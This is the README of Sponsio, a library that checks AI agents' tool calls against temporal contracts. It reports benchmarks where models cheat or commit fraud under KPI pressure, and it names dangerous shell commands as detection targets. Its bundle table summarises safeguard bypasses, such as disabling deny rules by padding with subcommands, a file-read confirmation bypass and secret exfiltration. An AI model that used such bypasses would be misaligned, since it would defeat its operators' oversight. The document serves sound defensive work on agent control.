
Runtime contract enforcement for LLM agent systems


Sponsio


Help us grow the Sponsio community for better shared Contract Library and policy enforcement. Star the repo!


Runtime enforcement for AI agents. Write policies in natural language; Sponsio compiles them into deterministic agent contracts. Checks run in under 0.01 ms at p50 for a single pre-warmed contract, add zero LLM cost at runtime, and cover all 10 OWASP Agentic risks.

An agent contract is a runtime check at every agent action, backed by formal methods. It is NOT a system prompt your agent can ignore or jailbreak.

Works with any stack. LangChain, Claude Agent, OpenAI Agents, Google ADK, CrewAI, Vercel AI, MCP, or any custom tool-calling loop. Python · TypeScript · Prompt · Agent Skills.

Demo video coming soon


SOTA Agent Safety Solutions

Sponsio architecture: Agent Flow + (Natural Language + Pattern Library) compile into Contracts (Assumption → Enforcement), enforced by a Fuzzy LTL Monitor (deterministic + stochastic) that decides Pass / Block · Warn · Escalate / Redirect for every function call, with full audit trail logs feeding back to the agent.

On ODCV-Bench — a third-party benchmark from McGill DMaS — 12 frontier LLMs × 80 trajectories (Claude-Opus-4.6 included), unguarded models cheat in 11.5%–66.7% of runs. With Sponsio, 84.5% of misalignment is blocked on average, while the next-best publicly announced runtime guardrail (Salus, YC W26, launch Feb 2026) reaches 52% on the same benchmark. On the Financial-Audit-Fraud-Finding scenario, frontier models commit fraud in 67% of trials (16/24); with Sponsio, 100% blocked.

Why Sponsio

| Approach | When it works | Where it fails | How Sponsio solves it |
| --- | --- | --- | --- |
| Prompt-injection filters | Pre-generation, on input text | Drifts on novel phrasings; sees text, not tool calls; no notion of action history | Enforces which tools may run, in what order, and with what arguments before the function call executes, with full trace context |
| Output validators | Post-generation, on response strings | The mistake (e.g. refund, DB write, API call) may already have fired | Blocks the call before execution; reasons over the full action history, not just the latest string |
| LLM-as-judge | Flexible, handles fuzzy properties; useful for offline eval | Stochastic verdicts, hundreds-of-ms latency, itself prompt-injectable; unsuitable as a synchronous gate | Sub-0.01 ms deterministic checks, zero LLM in the hot path; the stochastic pipeline is opt-in for fuzzy properties |
| Sandboxing & access control lists | Strong perimeter for identity- and resource-level isolation | Narrows agent capability; gates by who and what resource, not by behavior sequence | Enforces temporal contracts over the action sequence, including ordering, history, and multi-step invariants, while preserving agent capability |

Compared to other deterministic enforcers, Sponsio's edge:

1. Temporal contracts over sequential actions, not stateless rule matching. Existing enforcers evaluate each action in isolation. Sponsio reasons over the full trajectory: "verify_recipient before send_email", "no external calls after PII access", "refund_payment ≤ 3 calls per session".

2. Machine-checkable, not heuristic. Contracts compile to LTL formulas, then to deterministic finite automata (DFAs). Every verdict is a DFA transition, not a probabilistic confidence score. The same family of formal methods is used in hardware and distributed-systems verification (Intel FPU correctness, AWS S3 with TLA+). How it works →

3. Zero to protected in minutes, no DSL learning curve. Existing tools require hand-written YAML / Rego / Cedar policies from scratch. Sponsio offers four paths in:

  • Auto-inferred: sponsio init (interactive wizard) reads your tool signatures and writes starter contracts
  • Contract library: include pre-built bundles by capability (sponsio:capability/shell, …/filesystem) or by incident (sponsio:incident/openclaw); each bundle composes 44 det patterns underneath (sto atoms ship in Sponsio Cloud)
  • Natural language: sponsio validate "..." compiles plain English to LTL
  • Policy doc: sponsio scan --policy security.md parses an existing compliance document

4. Framework-agnostic and low-dependency. Other tools ship as opinionated stacks — bundling identity, SRE, dashboards, orchestration. Sponsio is a single enforcement library that plugs in alongside whatever observability, IAM, and orchestration you already use.
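
Points 1 and 2 above can be made concrete with a minimal sketch of a trajectory monitor. This is not Sponsio's engine: it hand-codes the two-state automaton for "verify_recipient before send_email" and a per-session counter for "refund_payment ≤ 3 calls", and the names `PrecedenceMonitor`, `CallBudget`, and `replay` are hypothetical.

```python
from dataclasses import dataclass


@dataclass
class PrecedenceMonitor:
    """Two-state automaton: `guarded` is allowed only after `required` was seen."""
    required: str
    guarded: str
    seen_required: bool = False  # the automaton's single bit of state

    def allows(self, tool: str) -> bool:
        return tool != self.guarded or self.seen_required

    def advance(self, tool: str) -> None:
        if tool == self.required:
            self.seen_required = True


@dataclass
class CallBudget:
    """Counter contract: at most `limit` executed calls to `tool` per session."""
    tool: str
    limit: int
    used: int = 0

    def allows(self, tool: str) -> bool:
        return tool != self.tool or self.used < self.limit

    def advance(self, tool: str) -> None:
        if tool == self.tool:
            self.used += 1


def replay(trajectory, monitors):
    """Return (index, tool) for every call that at least one monitor rejects."""
    blocked = []
    for index, tool in enumerate(trajectory):
        if all(m.allows(tool) for m in monitors):
            # Only calls that actually execute advance the monitors' state.
            for m in monitors:
                m.advance(tool)
        else:
            blocked.append((index, tool))
    return blocked


trajectory = ["send_email", "verify_recipient", "send_email"] + ["refund_payment"] * 4
monitors = [
    PrecedenceMonitor(required="verify_recipient", guarded="send_email"),
    CallBudget(tool="refund_payment", limit=3),
]
print(replay(trajectory, monitors))
```

The first `send_email` is rejected because no verification has happened yet, and the fourth `refund_payment` is rejected because the budget is spent. Each verdict depends only on the current state and the incoming call, which is what makes the check deterministic and cheap.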


Quick start

Pick your project's language. Instant onboarding with a single prompt or a 2-line CLI command.

Python

Paste into Claude Code / Codex / Cursor. The agent helps run the full onboarding process. Click for the full prompt template. Note: Cursor may not be able to explicitly show what Sponsio has blocked in the conversation, due to its own harness design.

One-shot prompt: Python

Or run the CLI yourself:

pip install sponsio
sponsio init .

init is an interactive wizard. It detects your framework (LangGraph / OpenAI / Claude Agent / Vercel AI / CrewAI / MCP / …), asks which IDE hosts to wire up (Claude Code / Codex / Cursor / OpenClaw, each at none / skill / full level), and asks whether to start in observe or enforce mode. Then it writes sponsio.yaml and prints the 2-line patch:

from sponsio.langgraph import Sponsio
from langgraph.prebuilt import create_react_agent

guard = Sponsio(config="sponsio.yaml", agent_id="coding_agent")
agent = create_react_agent(model, guard.wrap(tools))
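
The observe vs enforce choice the wizard asks about can be pictured with a small sketch. It assumes that observe mode records violations without blocking while enforce mode blocks them; that reading, and the names `Mode`, `Decision`, and `decide`, are assumptions for illustration rather than Sponsio's API.

```python
from dataclasses import dataclass
from enum import Enum


class Mode(Enum):
    OBSERVE = "observe"
    ENFORCE = "enforce"


@dataclass(frozen=True)
class Decision:
    allowed: bool  # whether the tool call may execute
    logged: bool   # whether a violation was recorded


def decide(mode: Mode, violates_contract: bool) -> Decision:
    """Map a contract verdict to an action under the given mode."""
    if not violates_contract:
        return Decision(allowed=True, logged=False)
    # A violation is always recorded; only enforce mode stops the call.
    return Decision(allowed=(mode is Mode.OBSERVE), logged=True)


for mode in Mode:
    print(mode.value, decide(mode, violates_contract=True))
```

Under this reading, running in observe mode first lets you see what a contract set would have blocked before any call is actually stopped.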

TypeScript

Paste into Claude Code / Codex / Cursor:

One-shot prompt: TypeScript

Or run the CLI yourself:

npm install -D @sponsio/sdk
npx sponsio init .

Note — the TS wizard is currently single-axis (provider × mode × agent). For the full multi-axis flow that also installs IDE-host plugins (Claude Code / Codex / Cursor / OpenClaw), paste the Python prompt above into your IDE agent — it works on TS projects too (drives the Python sponsio CLI, writes a TS-compatible sponsio.yaml).

import { Sponsio } from "@sponsio/sdk";
import { wrapTools } from "@sponsio/sdk/langchain";
import { ToolNode } from "@langchain/langgraph/prebuilt";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "coding_agent" });
const toolNode = new ToolNode(wrapTools(tools, guard));

For OpenClaw Community

The Python prompt above is the install path for you too. Pick openclaw=full when the wizard asks about IDE hosts; Sponsio then gates every before_tool_call event in your OpenClaw runtime through the contract engine, with ClawHavoc + CVE-2026-25253 coverage via the bundled sponsio:incident/openclaw pack.

Watch live blocks in your terminal — every Sponsio decision against your OpenClaw runtime streams here:

sponsio host trace openclaw --follow

sponsio.yaml can also be hand-written, scanned from a policy doc (sponsio scan --policy policy.md), or mined from traces (sponsio refresh). Syntax: docs/concepts/contracts.md.

Full walkthrough: QUICKSTART.md — config reference, observe → enforce flip, sponsio refresh, CI wiring, troubleshooting.


Benchmarks & Performance

Sponsio is benchmarked on two public agent-safety suites covering two distinct failure modes: rational metric gaming under KPI pressure, and dangerous bash / python snippets. All results come from offline replay against published trajectories, not Sponsio-authored test sets, and use the library only (no per-scenario LLM scan on the blocking path).

| Benchmark | What it measures | Sponsio result |
| --- | --- | --- |
| ODCV-Bench (12 LLMs × 80 trajectories) | Intent integrity under KPI pressure | 84.5% blocked (next-best published baseline: 52%) · 0 new FPs on clean scenarios |
| RedCode-Exec (1,410 cases) | Dangerous bash / python snippet detection | 95% bash · 90% python · 92% combined · 0% utility FP on 60-file clean-code audit |

Both libraries ship as loadable contract packs. Semantic properties that deterministic (det) checks can't fingerprint (tone, hallucination, scope drift in natural-language output) require an LLM judge. The OSS engine ships a Judge extension point you can plug into; the managed stochastic (sto) pipeline is a Sponsio Cloud feature.

Logic-flaw failures are deterministically catchable too

Conventional wisdom said RedCode's logic-flaw categories — biased decision logic, weak regex bypasses, missing-authorisation patterns, algorithmic flaws, memory leaks — were "behavioural defects with no syscall fingerprint" and required a semantic LLM judge. We pushed back on that label. Every such failure surfaces as a finite code-text pattern; once the pattern is enumerated, det binds. Seven new layers (bias_logic, weak_regex, algo_flaw, memory_leak, match_no_default, missing_auth, redcode_unauth_marker) lifted RedCode python from 69% → 90% with 0/60 FP on a clean-code audit (Sponsio's own source, tests, and API routes). The det/sto boundary is wider than most guardrail authors assumed; sto stays for properties that genuinely live in free-form output (tone, hallucination, faithfulness) — not for code-shape patterns whose finite enumeration was just under-explored.

Hot-Path Performance

| Workload | Contracts | p50 | p99 |
| --- | --- | --- | --- |
| Synthetic micro-bench (single contract, pre-warmed DFA) | 1 | 0.0052 ms | 0.012 ms |
| ODCV-Bench mandated (1,438 calls, scan-discovered) | 6–18 | 0.139 ms | 0.765 ms |
| RedCode bash (3,848 per-command calls) | 7 | 0.434 ms | 0.558 ms |
| RedCode python (810 whole-script calls) | 9 | 0.811 ms | 1.035 ms |

Backend-engineer anchor: at 0.139 ms p50 on ODCV mandated, Sponsio's hot path adds about as much overhead as a single fast local Redis read (typical 0.1–0.5 ms).

5,000×–60,000× faster than any LLM-as-judge guardrail (gpt-4o-mini, Lakera Guard, OpenAI Moderation; all 50–800 ms per check) on the same per-tool-call workload, at zero LLM cost on the hot path. Per-call latency scales linearly with contract count; p99 stays under 1.04 ms across every measured workload. The heaviest scenario (9-contract layered regex over a whole RedCode python script) is still roughly 50× faster than the cheapest LLM-as-judge call (50 ms against 0.811 ms p50 and 1.035 ms p99).
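
The ratio for the heaviest workload can be checked directly from the table and the 50 ms lower bound quoted for LLM-as-judge calls. The snippet uses only those published numbers; the `speedup` helper is just a name for the division.

```python
# p50 / p99 latencies in milliseconds, copied from the Hot-Path Performance table.
WORKLOADS = {
    "Synthetic micro-bench": (0.0052, 0.012),
    "ODCV-Bench mandated": (0.139, 0.765),
    "RedCode bash": (0.434, 0.558),
    "RedCode python": (0.811, 1.035),
}
CHEAPEST_JUDGE_MS = 50.0  # lower end of the 50-800 ms range quoted above


def speedup(judge_ms: float, sponsio_ms: float) -> float:
    """How many times longer the judge call takes than the Sponsio check."""
    return judge_ms / sponsio_ms


for name, (p50, p99) in WORKLOADS.items():
    at_p50 = speedup(CHEAPEST_JUDGE_MS, p50)
    at_p99 = speedup(CHEAPEST_JUDGE_MS, p99)
    print(f"{name}: {at_p50:,.0f}x at p50, {at_p99:,.0f}x at p99")
```

For RedCode python this gives about 62× at p50 and about 48× at p99, so "50×" is a fair round figure for the slowest measured case against the fastest judge.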

Full per-model breakdown, methodology, harness scripts: docs/reference/benchmarks.md.

Today's numbers are starting points, not ceilings

production traces ──→ sponsio scan ──→ proposed contracts
       ↑                                       │
       │                                       ▼
       └──────── enforcement ←──────── library (versioned)

Today's 84.5% / 92% are starting points, not ceilings. The library grows from your traces and ships back upstream — every new attack pattern, every newly observed unsafe call, feeds the next release.


Contract Library

Sixteen contract bundles ship out of the box, organized by tier (always-on / per-tool / per-incident). Each bundle is a YAML pack composed from Sponsio's 44 det patterns (sto atoms ship in Sponsio Cloud). Drop one into sponsio.yaml and your agent is guarded against a known failure class in one line, with no per-contract authoring. The seven highlighted below are the most commonly used.

Starter bundles

| Bundle | Tier | Rules | Who it's for |
| --- | --- | --- | --- |
| sponsio:core/universal | Always-on | 5 sto (Cloud) | Any LLM agent. Response-scoped checks: prompt injection, jailbreak, harm, toxic, semantic PII. Requires a configured judge: managed in Sponsio Cloud, or BYO judge via the OSS Judge extension point. Without one, these log-and-skip on OSS. |
| sponsio:core/runaway | Always-on | 5 det | Any agent with token use, delegation, or tool loops. The "while(true) with a credit card" defense: token budgets, delegation depth, loop caps. |
| sponsio:capability/shell | Per-tool | 11 det | Agents exposing exec / bash. Catches rm -rf /, fork bombs, curl \| bash, reverse shells, line-continuation evasion. Inspired by Claude Code #10077 (rm -rf $HOME, Oct 2025), the Replit prod-DB wipe (Fortune coverage, Jul 2025), and the Ansible rm -rf {foo}/{bar} postmortem on 1,535 servers (Marsala, 2016). |
| sponsio:capability/filesystem | Per-tool | 13 det | Agents exposing read / write / edit / apply_patch. Sensitive-path denies, workspace scoping, bootstrap-file gates (CLAUDE.md, AGENTS.md, .cursorrules). Inspired by the OpenClaw weather-skill .env exfil and the Cursor .cursorignore bypass (CVE-2025-64110 / GHSA-vhc2-fjv4-wqch). |
| sponsio:incident/openclaw | Incident | 45 mixed | OpenClaw / ClawCode users. Covers CVE-2026-25253 (WebSocket 1-click RCE), ClawHavoc (1,184 malicious skills on ClawHub; Koi Security disclosure, Feb 2026), the --yolo flag, and the weather-skill exfil. A worked example to fork rules from. |
| sponsio:incident/cursor-railway-wipe | Incident | mixed | Replays the PocketOS production-DB wipe (Apr 24, 2026): Cursor + Claude Opus 4.6 deleted prod + backups in 9 seconds via an over-scoped Railway API token. (Tom's Hardware · Railway's own postmortem) Catches credential-scope abuse + destructive-API gates. |
| sponsio:incident/claude-code-secret-bypass | Incident | mixed | Replays CVE-2025-55284 (overly broad safe-command allowlist → file-read confirmation bypass) and the deny-rule cap bypass (50-subcommand padding silently disables deny rules). Catches secret reads + arg-padding evasion. |

# sponsio.yaml — one-line bundle inclusion
agents:
  my_agent:
    workspace: "/srv/my-bot"
    include:
      - sponsio:core/runaway          # always-on
      - sponsio:core/universal        # always-on
      - sponsio:capability/shell      # if your agent runs commands
      - sponsio:capability/filesystem # if your agent touches files
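
The `workspace:` key, together with the filesystem bundle's "workspace scoping", suggests a containment check on file paths. Here is a minimal sketch of that idea using only `pathlib`, assuming scoping means "the resolved path must stay under the workspace root". The function name `inside_workspace` is hypothetical and this is not Sponsio's implementation.

```python
from pathlib import Path


def inside_workspace(workspace: str, candidate: str) -> bool:
    """True if `candidate` resolves to the workspace root or something below it."""
    root = Path(workspace).resolve()
    # Relative paths are interpreted against the workspace. resolve() collapses
    # `..` segments and follows symlinks before the containment test.
    target = (root / candidate).resolve()
    return target == root or root in target.parents


for path in ["notes/todo.md", "../../etc/passwd", "/etc/passwd", "a/../b.txt"]:
    print(path, inside_workspace("/srv/my-bot", path))
```

Resolving before comparing is the important step: a plain string-prefix check would accept `/srv/my-bot/../../etc/passwd`. Containment alone does not cover sensitive files inside the workspace (such as `.env`), which is why the bundle lists sensitive-path denies as a separate rule class.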

sponsio init auto-selects tier-0 bundles based on your detected tool inventory. You can disable or retune individual rules without forking the pack: customized: lets you target rules by their desc, pack_source, or pattern field. Rename canonical tool names (exec, read, edit) to your agent's via tool_rename:.

Full bundle reference is at docs/reference/contract-lib.md. The underlying primitives that bundles compose are catalogued separately: 44 det patterns in docs/reference/patterns.md. Sto atoms (LLM-judge evaluators for tone, hallucination, scope drift, etc.) are part of Sponsio Cloud — the OSS engine ships a Judge extension point for bring-your-own-judge use.
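
To show what a deterministic shell pattern can look like, here is a minimal sketch that joins backslash line continuations before matching two of the command shapes named in the bundle table (`rm -rf /` and `curl | bash`). The regexes and the names `PATTERNS`, `normalize`, and `flag_command` are illustrative assumptions, far narrower than a real rule pack, and are not taken from Sponsio's pattern library.

```python
import re

# Illustrative patterns only; a production pack would need many more variants.
PATTERNS = {
    # rm with both -r and -f in one flag group, aimed at /, ~ or $HOME
    "rm_rf_root": re.compile(r"\brm\s+-(?=\w*r)(?=\w*f)\w+\s+(?:/|~|\$HOME)(?:\s|$)"),
    # a download piped straight into a shell interpreter
    "curl_pipe_shell": re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
}


def normalize(command: str) -> str:
    """Join backslash-newline continuations the way a POSIX shell does."""
    return re.sub(r"\\\r?\n", "", command)


def flag_command(command: str) -> list[str]:
    """Return the names of all patterns that match the normalized command."""
    text = normalize(command)
    return [name for name, pattern in PATTERNS.items() if pattern.search(text)]


for cmd in ["rm -rf /", "rm \\\n  -rf $HOME", "curl -s https://example.com/i.sh | bash", "rm -rf ./build"]:
    print(repr(cmd), flag_command(cmd))
```

Normalizing first is what defeats the line-continuation trick: without it, `rm \` followed by `-rf $HOME` on the next line would slip past a single-line regex.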

Want a bundle for your agent type? This is currently the highest-leverage way to contribute. Open an issue with your incident, CVE, or pattern.


Integrations

Pick your framework — each block expands to a drop-in snippet. Python and TypeScript share the same engine and DSL.

No framework — custom tool-calling loop
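Python:

from sponsio import Sponsio

guard = Sponsio(config="sponsio.yaml", agent_id="bank_bot")

# agent_calls: iterable of (tool_name, kwargs) pairs produced by your agent loop
for name, args in agent_calls:
    result = guard.guard_before(name, args)  # check the call before it runs
    if result.blocked:
        continue  # skip the blocked call
    output = tools[name](**args)
    guard.guard_after(name, output)  # post-call hook with the tool's output

TypeScript:

import { Sponsio } from "@sponsio/sdk";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "bank_bot" });

// agentCalls: iterable of [toolName, args] pairs produced by your agent loop
for (const [name, args] of agentCalls) {
  const result = guard.guardBefore(name, args);
  if (result.blocked) continue; // skip the blocked call
  const output = tools[name](args);
  guard.guardAfter(name, output);
}
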
LangGraph / LangChain.js — wrap tools
Python:

from sponsio.langgraph import Sponsio
from langgraph.prebuilt import create_react_agent

guard = Sponsio(config="sponsio.yaml", agent_id="hr_bot")
agent = create_react_agent(llm, guard.wrap(tools))

TypeScript:

import { Sponsio } from "@sponsio/sdk";
import { wrapTools } from "@sponsio/sdk/langchain";
import { ToolNode } from "@langchain/langgraph/prebuilt";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "hr_bot" });
const toolNode = new ToolNode(wrapTools(tools, guard));

Claude Agent SDK — native hooks, zero tool wrapping
Python:

import asyncio

from sponsio.claude_agent import Sponsio
from claude_agent_sdk import ClaudeSDKClient, ClaudeAgentOptions

guard = Sponsio(config="sponsio.yaml", agent_id="support_bot")
options = ClaudeAgentOptions(hooks=guard.hooks())


async def main():
    # `async with` must run inside a coroutine
    async with ClaudeSDKClient(options=options) as client:
        await client.query("Refund order #W456.")


asyncio.run(main())

TypeScript:

import { Sponsio } from "@sponsio/sdk";
import { sponsioHooks } from "@sponsio/sdk/claude-agent";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "support_bot" });
const hooks = sponsioHooks(guard);
// Pass `hooks` to ClaudeSDKClient options.

OpenAI SDK — monkey-patch or explicit wrap
Python:

from openai import OpenAI
from sponsio.openai import Sponsio

client = OpenAI()  # reads OPENAI_API_KEY from the environment
guard = Sponsio(config="sponsio.yaml", agent_id="db_admin")
resp = client.chat.completions.create(...)
guard.check_response(resp)  # explicit check of the model's response

TypeScript:

import OpenAI from "openai";
import { Sponsio } from "@sponsio/sdk";
import { wrapOpenAI } from "@sponsio/sdk/openai";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "db_admin" });
const client = wrapOpenAI(new OpenAI(), guard);

For a quick no-YAML wire-up (handy in scripts / notebooks): from sponsio.openai import patch_openai.

OpenAI Agents SDK — wrap Agent tools
from sponsio.agents import Sponsio
from agents import Agent, Runner

guard = Sponsio(config="sponsio.yaml", agent_id="deploy_bot")

agent = Agent(
    name="deploy_bot",
    instructions="Ship v2.1 to production.",
    tools=guard.wrap([run_tests, deploy_staging, deploy_production]),
)

result = Runner.run_sync(agent, "Deploy v2.1 now.")

TypeScript: not yet supported.

Google ADK — wrap Agent tools (Gemini)
Python:

from sponsio.google_adk import Sponsio
from google.adk.agents.llm_agent import Agent

guard = Sponsio(config="sponsio.yaml", agent_id="travel_agent")

root_agent = Agent(
    name="travel_agent",
    model="gemini-flash-latest",
    instruction="Search before booking. Charge only once.",
    tools=guard.wrap([search_flights, book_flight, charge_payment]),
)

TypeScript:

import { Sponsio } from "@sponsio/sdk";
import { wrapGoogleAdkTools } from "@sponsio/sdk/google-adk";
import { LlmAgent } from "@google/adk";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "travel_agent" });
const tools = wrapGoogleAdkTools([searchFlights, bookFlight, chargePayment], guard);
export const rootAgent = new LlmAgent({ name: "travel_agent", tools, model: "gemini-flash-latest" });

Vercel AI SDK — middleware
Python:

from sponsio.vercel_ai import Sponsio

guard = Sponsio(config="sponsio.yaml", agent_id="publish_bot")

async for msg in agent.run(model, messages, middleware=[guard.wrap()]):
    ...

TypeScript:

import { Sponsio } from "@sponsio/sdk";
import { sponsioMiddleware } from "@sponsio/sdk/vercel-ai";

const guard = new Sponsio({ config: "sponsio.yaml", agentId: "publish_bot" });
const middleware = sponsioMiddleware(guard);

CrewAI — Crew-level hooks
from sponsio.crewai import Sponsio
from crewai import Agent, Crew, Task

guard = Sponsio(config="sponsio.yaml", agent_id="moderator")

crew = Crew(
    agents=[agent],
    tasks=[task],
    before_tool_call=guard.on_tool_start,
    after_tool_call=guard.on_tool_end,
)
result = crew.kickoff()

TypeScript: not yet supported.

MCP — proxy the MCP client
from sponsio.mcp import MCPContractProxy

# Build a sponsio System from your contracts — see runnable example for full wire-up.
proxy = MCPContractProxy(mcp_client=your_mcp_client, system=system)

# Use `proxy` wherever you called the raw MCP client; contracts apply transparently.
result = await proxy.call_tool("write_external_api", {"data": "batch_1"})

TypeScript: not yet supported.
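
The proxy pattern itself can be sketched without any Sponsio or MCP dependency. In the block below, `FakeMCPClient`, `ContractProxy`, `ContractViolation`, and the `allow` callback are all hypothetical stand-ins; only the `call_tool(name, arguments)` shape is taken from the snippet above.

```python
import asyncio
from typing import Any, Callable, Protocol


class ToolClient(Protocol):
    async def call_tool(self, name: str, arguments: dict[str, Any]) -> Any: ...


class ContractViolation(Exception):
    """Raised instead of forwarding a call that the policy rejects."""


class ContractProxy:
    """Same call_tool interface as the wrapped client, with a check in front."""

    def __init__(self, client: ToolClient, allow: Callable[[str, dict[str, Any]], bool]):
        self._client = client
        self._allow = allow
        self.audit: list[tuple[str, str]] = []  # (tool name, verdict)

    async def call_tool(self, name: str, arguments: dict[str, Any]) -> Any:
        if not self._allow(name, arguments):
            self.audit.append((name, "block"))
            raise ContractViolation(f"{name} blocked by contract")
        self.audit.append((name, "pass"))
        return await self._client.call_tool(name, arguments)


class FakeMCPClient:
    """Stand-in for a real MCP client; echoes the request back."""

    async def call_tool(self, name: str, arguments: dict[str, Any]) -> Any:
        return {"tool": name, "echo": arguments}


async def demo():
    proxy = ContractProxy(FakeMCPClient(), allow=lambda name, _args: name != "write_external_api")
    ok = await proxy.call_tool("read_db", {"table": "orders"})
    try:
        await proxy.call_tool("write_external_api", {"data": "batch_1"})
    except ContractViolation:
        pass  # the rejected call never reaches the wrapped client
    return ok, proxy.audit


print(asyncio.run(demo()))
```

Because the proxy exposes the same method as the client it wraps, existing call sites need no changes beyond swapping the object, which is the sense in which contracts "apply transparently".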


Note on the snippets above. All examples assume you've run sponsio init . first, which walks the wizard, generates a sponsio.yaml with a starter contract set inferred from your tool inventory, and prints the wrap snippet to paste. To populate the YAML differently — pattern-library bundle, hand-written rules, natural-language one-liners, or parsed from a policy doc (sponsio scan --policy security.md) — see Contract types and authoring and docs/concepts/contracts.md for full syntax.


Docs

AI agents reading this repo: llms.txt lists canonical doc paths; llms-full.txt is the concatenated full context dump.


Security

Sponsio enforces runtime contracts, so its own correctness matters. Found something? Report privately via GitHub's security advisory form rather than a public issue. See SECURITY.md for scope, timelines, and what counts as in-scope (enforce-mode bypasses, LTL-evaluator crashes, session-log leakage, judge-prompt injection, etc.).


Contributing

Patches, issue reports, and new pattern proposals are welcome. Start with CONTRIBUTING.md.


Important notes

Sponsio enforces runtime contracts that you define — it does not certify your application's compliance with any regulatory framework. If you operate in regulated domains (HIPAA, GDPR, SOX, EU AI Act, financial services, healthcare), Sponsio's controls and our OWASP Agentic Top 10 mapping are inputs to your compliance program. They are not substitutes for qualified security audit, legal review, or domain-specific regulatory analysis. Author your contracts with appropriate review and revisit them when your agent's tool surface changes.

Det contracts give you machine-checkable enforcement at the action boundary. They do not protect against vulnerabilities upstream of Sponsio (compromised LLM provider, malicious tools you've allowlisted, infrastructure-layer risks like transport encryption / SBOM provenance). See SECURITY.md for the full scope.


License & open source promise

Apache 2.0 — see LICENSE.

Sponsio Labs is a commercial company; Sponsio Cloud (pip install sponsio[cloud]) opens mid-May 2026 and adds the managed LLM-judge pipeline, cross-customer pattern intelligence, and a hosted multi-tenant dashboard. The OSS engine is complete and production-ready for self-hosted use — see OSS_PROMISE.md for what stays in OSS forever, what we sell, and what we promise about the boundary.

Sponsio™ is a trademark of Sponsio Labs — see BRAND.md.
